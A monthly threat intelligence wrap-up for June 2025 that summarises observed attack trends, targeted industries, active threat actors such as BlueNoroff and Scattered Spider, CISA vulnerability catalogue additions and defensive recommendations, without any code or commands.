Monthly Wrap - June 2025

Overview

The threat landscape in June 2025 highlights a clear shift: cyber operations are increasingly defined by the exploitation of trust, identity, and user behavior rather than just malware signatures or known vulnerabilities. Adversaries are moving with precision through hybrid cloud environments, capitalizing on the gaps between user expectations, platform design, and defensive assumptions. Rather than relying on traditional payloads, attackers are deploying CAPTCHA lures, deepfake video calls, OAuth abuse, and fake update prompts to gain access through legitimate interaction flows. This month’s activity revealed widespread abuse of services like GitHub, Dropbox, Microsoft Entra, Zoom, and Discord—platforms that enterprises inherently trust. At the same time, SSO misconfigurations, cloud identity abuse, and user fatigue around verification emerged as consistent weak points exploited by attackers.

The operational behavior of threat actors this month suggests an ecosystem designed for stealth, persistence, and scalability. Malware campaigns increasingly deploy fileless execution, PowerShell loaders, certificate abuse, and multi-stage delivery chains, often triggered by seemingly routine user actions. Even well-defended endpoints are being bypassed through CAPTCHA-driven smuggling, clipboard injection, and batch script execution, typically originating from spoofed websites or compromised infrastructure. Meanwhile, modular malware families, including AsyncRAT, EDDIESTEALER, NetSupport, and More_eggs, were observed leveraging fake verification mechanisms and trusted brand impersonation to evade controls. On the mobile and IoT fronts, actors deployed malware such as SparkKitty, Crocodilus, and BADBOX 2.0, exploiting firmware vulnerabilities, default credentials, and accessibility frameworks to maintain persistence and facilitate lateral movement. These tools are not merely opportunistic; they are designed to blend into expected user environments, making detection a post-compromise challenge.

Across geopolitical boundaries, nation-state and state-aligned actors executed highly targeted campaigns with both strategic and disruptive intent. Chinese, Russian, North Korean, and Iranian operations focused on credential theft, espionage, wiper malware, and long-term access, often delivered through tailored phishing campaigns that employed region-specific file formats, impersonation of diplomatic entities, and deepfake-enabled communications. These operations continue to blur the lines between espionage and cybercrime, frequently sharing infrastructure, techniques, or payloads. Notably, threat actors favored cloud-based staging, sandbox evasion, and modular loaders, reflecting the operational agility seen in advanced eCrime groups. Critical infrastructure sectors, including Energy, Finance, Defense, and Telecommunications, remain high-priority targets due to their complex and often fragmented security environments. These campaigns highlight a broader strategic pivot: the intrusion surface is no longer defined by firewalls and endpoints but by identity, operational processes, and trust relationships. To remain resilient, organizations must shift their focus from static controls to dynamic understanding: identity hardening, behavioral telemetry, and secure workflows must take precedence.

Key Trends Identified

• Advanced Credential Theft via Browser Exploitation: Info stealers like EDDIESTEALER bypassed browser encryption to extract cookies, session tokens, and saved credentials, even from inactive browsers, using advanced memory scraping and evasion techniques.
• AI Tool Impersonation for Malware Delivery: Fake installers for AI tools, including ChatGPT and InVideo were used to distribute ransomware and infostealers, including Lucky_Gh0$t and CyberLock, often through SEO poisoning and social media campaigns.
• Deepfake-Based Social Engineering via Zoom: North Korean threat actors employed real-time deepfake video impersonations of executives during Zoom calls to socially engineer macOS-specific malware deployment, demonstrating a new dimension of trust exploitation.
• Developer-Focused Supply Chain Attacks: Poisoned GitHub repositories, malicious JavaScript templates, and typo squatting in package managers targeted developer workflows and CI/CD environments to enable credential theft and upstream compromise.
• Fake CAPTCHA Smuggling Techniques: Sophisticated phishing campaigns deployed fake CAPTCHA challenges to trick users into executing obfuscated PowerShell or CMD scripts via the Windows Run dialog, enabling memory-resident malware delivery without writing files to disk.
• IoT Device Exploitation at Scale: Botnets like PumaBot exploited Linux-based IoT devices using SSH brute-force attacks, default credentials, and stealth persistence, particularly within manufacturing and surveillance infrastructure.
• Mobile Malware Persistence and Expansion: Mobile malware families like Crocodilus, Godfather, and SparkKitty used accessibility abuse, overlay attacks, and rogue APKs to exfiltrate financial and personal data from Android devices across multiple regions.
• Modular, Fileless Malware Deployment: Adversaries relied on staged PowerShell loaders, LNK file droppers, and in-memory execution—often using steganography, clipboard poisoning, or certificate-stuffed binaries—to evade detection and establish persistent access.
• Wiper Malware in Targeted Espionage: State-aligned actors deployed destructive ‘PathWiper’ malware in targeted Critical infrastructure attacks, using disk-level sabotage alongside espionage to disrupt operations and erase digital evidence.

Industries Targeted

• Defense & Government: BlueNoroff, Kimsuky, UNC6293, and other state-aligned APTs conducted espionage campaigns against diplomatic, defense, and infrastructure targets using deepfakes, region-specific loaders, and wiper malware like PathWiper.
• Financial Sector: EDDIESTEALER, Crocodilus, and Lucky_Gh0$t were deployed via phishing lures, CAPTCHA smuggling, and mobile overlays to steal banking credentials, cryptocurrency wallets, and corporate access tokens.
• Healthcare: Open WebUI exploitation, GitHub-hosted malware, and AI-generated Python scripts were used to deliver infostealers and crypto miners across exposed clinical systems lacking runtime threat monitoring.
• Manufacturing & Industrial IoT: PumaBot and Flodrix exploited firmware vulnerabilities and default credentials in IoT infrastructure, particularly surveillance systems and traffic camera networks, to deploy miners and build proxy botnets.
• Technology & SaaS: OAuth abuse, SSO manipulation, and cloud-native persistence techniques were used to exploit misconfigurations in Microsoft Entra, AWS, and iOS provisioning flows, targeting backend integrations and user trust paths.

Most Active Threat Actors

• BlueNoroff (North Korea): Used deepfake video impersonation during live Zoom calls to socially engineer the delivery of macOS malware to enterprise targets in the Legal and Technology sectors.
• Crocodilus Operator (eCrime): Expanded Android trojan operations across Europe and South America, targeting Banking and Cryptocurrency users with overlay attacks and fake contact injections to bypass fraud detection.
• EDDIETEALER Operator (eCrime): Delivered Rust-based infostealers through fake CAPTCHA pages to infiltrate financial and crypto-focused organizations, extracting browser credentials, tokens, and wallet data.
• FIN6 / Storm-0408 (eCrime): Distributed NetSupport RAT through fake Gitcode and DocuSign websites, targeting software development and B2B tech firms with clipboard poisoning and staged PowerShell loaders.
• Kimsuky (North Korea): Deployed region-specific malware loaders targeting diplomatic and defense entities across South Korea and Southeast Asia, using language-specific lures to evade conventional scanners.
• Scattered Spider (eCrime): Continued multi-industry attacks against Finance, Hospitality, and Telecom firms using vishing, MFA fatigue, and credential harvesting, followed by ransomware deployment via the DragonForce RaaS platform.
• UNC6293 (Russia-aligned): Conducted espionage campaigns against Critical infrastructure and Government agencies in Eastern Europe using modular backdoors and sandbox evasion to maintain long-term persistence.

Vulnerability Asset Management

June 2025 Threat Landscape: Shadow Risk, ICS Vulnerabilities, and the Danger of Delayed Patching

June 2025 marked a pivotal moment in the evolving threat landscape, as CISA added 19 actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog and issued multiple alerts involving enterprise platforms critical to daily operations. From remote management software and business collaboration tools to legacy ICS devices, CISA's KEV additions highlight a disturbing trend: attackers have shifted focus from opportunistic targets to capitalizing on "shadow risks"—unpatched, high-value systems with elevated privileges, limited patch visibility, and frequent internet exposure.

Enterprise software powering critical operations often lacks automated update mechanisms and falls outside standard vulnerability management workflows, creating persistent blind spots that attackers increasingly exploit. These "shadow infrastructure" components—from JetBrains TeamCity and Ivanti Connect Secure to Zimbra Collaboration Suite—serve as force multipliers for lateral movement once compromised.

Compounding this enterprise software trend, CISA issued over 35 ICS advisories in June, affecting major vendors like Siemens and Schneider Electric, with several years-old CVEs resurfacing in active exploitation campaigns. This pattern highlights how attackers exploit patch fatigue and the false sense of security that often surrounds legacy vulnerabilities, while the surge in ICS vulnerabilities exposes the myth of air-gapped operational technology. Traditional CVSS-based prioritization models have proven inadequate in this context, as they often overlook the threat intelligence that guides real-world attack behavior.

This month's threat landscape calls for urgent attention to visibility, prioritization, and targeted remediation across all environments. Based on these observations, here are some recommendations to help address any security gaps that may exist in your environment:

• Shadow Risk in Enterprise Tools:
  • Prioritize threat-informed patching over traditional CVSS-based models.
  • Use CISA’s KEV Catalog to drive risk-based remediation planning.
• Surge in ICS Vulnerability Disclosures:
  • Implement continuous asset discovery in OT environments to enhance security and operational efficiency.
  • Coordinate with vendors on structured vulnerability disclosure and patch response plans to ensure effective management of security risks.
• Delayed Patching Remains a Key Threat Vector:
  • Don’t assume older CVEs are lower risk—exploit activity proves otherwise.
  • Establish accountability for remediating long-standing vulnerabilities.
• Remote Access and Middleware Under Fire:
  • Enforce multi-layered monitoring, MFA, and privilege controls on RMM tools.
  • Validate patching and hardening middleware and integration layers, especially at IT-OT boundaries.

Organizations must evolve their vulnerability management practices beyond static scoring models to account for attacker behavior, asset exposure, and real-time exploit intelligence.

Hunter Insights

The threat landscape in June 2025 represents a fundamental paradigm shift from traditional attack vectors toward sophisticated trust exploitation, signaling that adversaries have successfully weaponized identity systems and human verification processes. The convergence of deepfake technology in live video communications, CAPTCHA-based malware smuggling, and fileless execution chains demonstrates threat actors' strategic pivot toward post-perimeter attack methodologies that exploit the weakest link in modern security architectures: user behavior and institutional trust relationships.

Hunter Strategy anticipates a significant escalation in AI-powered social engineering campaigns over the next 6-12 months, particularly deepfake impersonation targeting C-suite executives during critical business communications, alongside an increase in the abuse of legitimate cloud services for malware staging and command-and-control operations. Organizations should immediately prioritize zero-trust identity verification, behavioral analytics for cloud resource access, and user education focused on verification protocols for video communications and software updates. The blurring of nation-state and eCrime TTPs observed this month will accelerate, with state-aligned actors increasingly adopting cybercriminal infrastructure and techniques to complicate attribution while maintaining plausible deniability—necessitating defense strategies that focus on behavioral indicators rather than traditional threat actor profiling.